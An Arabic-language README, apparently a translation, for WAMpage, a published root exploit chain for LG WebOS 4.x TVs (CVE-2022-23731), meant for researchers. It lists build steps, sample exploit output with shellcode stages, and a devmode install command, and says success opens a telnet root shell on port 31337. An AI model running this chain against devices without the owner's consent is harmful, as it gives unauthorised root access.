
WAMpage - سلسلة استغلال لرفع صلاحيات الجذر في WebOS (CVE-2022-23731)
WAMpage - سلسلة استغلال LPE للحصول على صلاحيات الجذر في WebOS (CVE-2022-23731)
هذا الاستغلال ذو أهمية أساسية للباحثين الآخرين - إذا كنت تريد فقط عمل روت لتلفازك، فغالبًا ما تريد RootMyTV، الذي يقدم جذرًا ثابتًا موثوقًا بنقرة واحدة.
يدعم حاليًا فقط WebOS 4.x على معالجات SoC ببنية 32-بت. هذا البرنامج مقدم كما هو (AS IS)، استخدمه على مسؤوليتك الخاصة، إلخ. إلخ.
الشرح: https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

المتطلبات الأساسية:
apt install qemu-user
npm install -g @webosose/ares-cli
التجميع:
make
سيعمل make test على بناء وتشغيل الاستغلال في d8، الذي يعمل في qemu-arm. (يتم تضمين نسخة مجمعة مسبقًا من d8 وتبعياتها في دليل bin/). إذا نجح الاستغلال، فستحصل غالبًا على شيء مثل هذا:
[+] Starting WAMpage...
[+] addrof(myobj) = 0x5a68f5d1
[+] Test: reconstructed myobj: {"foo":"bar"}
[+] Set up arbread32/arbwrite32.
[+] stage2 shellcode loaded @ 0xff458000
[+] myfunc @ 0x5a693369
[+] stage1 RWX buf @ 0x5bb8f280
[+] Copied stage1 shellcode. Calling...
Traceback (most recent call last):
File "<stdin>", line 25, in <module>
IOError: [Errno 13] Permission denied: '/dev/mem'
من المتوقع حدوث خطأ الإذن هذا، بافتراض أن جهازك ليس مضبوطًا بشكل خاطئ تمامًا.
يمكنك اختبار استغلال devmemes.py بتشغيله مباشرة على التلفاز، لكنك ستحتاج إما إلى صلاحيات الجذر منذ البداية، أو إلى نوع آخر من الأصداف غير المعزولة (unsandboxed/unjailed).
يمكنك استخدام ares-install، أو نسخ ملف IPK يدويًا وتشغيل هذا من قشرة وضع المطور (devmode shell):
luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"tv.rootmy.wampage","ipkUrl":"/path/to/wampage.ipk","subscribe":true}'
شغّل التطبيق واضغط على زر "Start Exploit". إذا سارت الأمور على ما يرام، يجب أن يفتح خادم telnet على المنفذ 31337.